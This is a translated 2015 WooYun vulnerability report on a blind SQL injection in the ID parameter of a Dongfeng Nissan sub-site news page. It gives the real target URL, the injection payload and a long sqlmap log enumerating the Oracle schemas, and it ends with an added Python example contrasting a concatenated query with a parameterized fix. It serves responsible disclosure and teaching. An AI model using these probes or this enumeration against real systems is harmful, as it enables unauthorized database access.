
Vulnerability summary

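Bug ID: wooyun-2015-0132529

Title: An SQL injection on a Dongfeng Nissan sub-site

Vendor: Dongfeng Nissan Passenger Vehicle Company

Author: MT哥

Submitted: 2015-08-09 00:18

Fixed: 2015-09-23 00:56

Published: 2015-09-23 00:56

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]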



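Vulnerability details

Disclosure status:

2015-08-09: Details reported to the vendor, awaiting vendor handling
2015-08-09: Confirmed by the vendor; details disclosed to the vendor only
2015-08-19: Details disclosed to core white hats and experts in the relevant field
2015-08-29: Details disclosed to regular white hats
2015-09-08: Details disclosed to trainee white hats
2015-09-23: Details disclosed to the public

Brief description:

I hear the vendor is quite active.

Detailed description:

http://www.dfmg.com.cn/EN/NewsDetail.aspx?ID=3238


A simple check with and 1=1 / 1=2.

Proof of vulnerability: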

[22:28:35] [INFO] resuming back-end DBMS 'oracle' 
[22:28:36] [INFO] testing connection to the target URL
[22:28:39] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=3238 AND 4837=4837
---
[22:28:39] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[22:28:39] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[22:28:39] [INFO] fetching database (schema) names
[22:28:39] [INFO] fetching number of databases
[22:28:39] [INFO] resumed: 16
[22:28:39] [INFO] retrieving the length of query output
[22:28:39] [INFO] retrieved: 6
[22:28:47] [INFO] resumed: CTXSYS
[22:28:47] [INFO] retrieving the length of query output
[22:28:47] [INFO] retrieved: 4
[22:28:59] [INFO] resumed: JBPM
[22:28:59] [INFO] retrieving the length of query output
[22:28:59] [INFO] retrieved: 5
[22:29:12] [INFO] resuming partial value: M
[22:29:52] [INFO] retrieved: MDSYS
[22:29:52] [INFO] retrieving the length of query output
[22:29:52] [INFO] retrieved: 3
[22:30:32] [INFO] retrieved: ODM
[22:30:32] [INFO] retrieving the length of query output
[22:30:32] [INFO] retrieved: 7
[22:31:32] [INFO] retrieved: ODM_MTR
[22:31:32] [INFO] retrieving the length of query output
[22:31:32] [INFO] retrieved: 7
[22:32:35] [INFO] retrieved: OLAPSY@
[22:32:35] [INFO] retrieving the length of query output
[22:32:35] [INFO] retrieved: 6
[22:33:41] [INFO] retrieved: ORDSYS
[22:33:41] [INFO] retrieving the length of query output
[22:33:41] [INFO] retrieved: 5
[22:34:34] [INFO] retrieved: OUTLN
[22:34:34] [INFO] retrieving the length of query output
[22:34:34] [INFO] retrieved: 8
[22:35:45] [INFO] retrieved: PERFSTAT
[22:35:45] [INFO] retrieving the length of query output
[22:35:45] [INFO] retrieved: 4
[22:36:28] [INFO] retrieved: RMAN
[22:36:28] [INFO] retrieving the length of query output
[22:36:28] [INFO] retrieved: 5
[22:37:22] [INFO] retrieved: SCOTT
[22:37:22] [INFO] retrieving the length of query output
[22:37:22] [INFO] retrieved: 3
[22:37:57] [INFO] retrieved: SYS
[22:37:57] [INFO] retrieving the length of query output
[22:37:57] [INFO] retrieved: 6
[22:38:56] [INFO] retrieved: SYSTEM
[22:38:56] [INFO] retrieving the length of query output
[22:38:56] [INFO] retrieved: 5
[22:39:48] [INFO] retrieved: WKSYS
[22:39:48] [INFO] retrieving the length of query output
[22:39:48] [INFO] retrieved: 5
[22:40:35] [INFO] retrieved: WMSYS
[22:40:35] [INFO] retrieving the length of query output
[22:40:35] [INFO] retrieved: 3
[22:41:19] [INFO] retrieved: XDB
available databases [16]:
[*] CTXSYS
[*] JBPM
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OLAPSY@
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] RMAN
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB

Remediation:

WAF + filtering

Copyright notice: when reposting, please credit the source MT哥@乌云
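
Added example, not part of the original report or the vendor's code: a minimal reproduction of why the ID parameter answers the true/false probes differently, next to a handler that validates ID as an integer and binds it as a parameter, which fixes the root cause behind the filtering suggested above. Assumptions: sqlite3 stands in for the Oracle back end, and the news table, its sample row and the function names are hypothetical.

```python
import sqlite3

# Probe strings taken from the report: the sqlmap payload and the "1=2" check.
TRUE_PROBE = "3238 AND 4837=4837"
FALSE_PROBE = "3238 AND 1=2"


def make_db():
    # Constructed sample data; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (3238, 'Sample article')")
    return db


def news_detail_vulnerable(db, raw_id):
    # Before: the query-string value is concatenated into the statement,
    # so anything appended after the number becomes part of the WHERE clause.
    sql = "SELECT title FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def news_detail_fixed(db, raw_id):
    # After: accept only a short run of ASCII digits, then bind the value.
    # The statement text never changes, whatever the client sends.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # the page handler would answer with HTTP 400 here
    sql = "SELECT title FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


def page_differs(handler, db, true_probe, false_probe):
    # Boolean-based blind detection relies on this signal: the response
    # changes with the truth value of the appended condition.
    return handler(db, true_probe) != handler(db, false_probe)


if __name__ == "__main__":
    db = make_db()
    for handler in (news_detail_vulnerable, news_detail_fixed):
        differs = page_differs(handler, db, TRUE_PROBE, FALSE_PROBE)
        print(handler.__name__, "responds differently to true/false probes:", differs)
```

The same true/false pair can be replayed as a regression test after the fix is deployed: both requests should produce the same rejection.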


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 5

Confirmed: 2015-08-09 00:54

Vendor reply:

Thanks for the heads-up!

Latest status:

None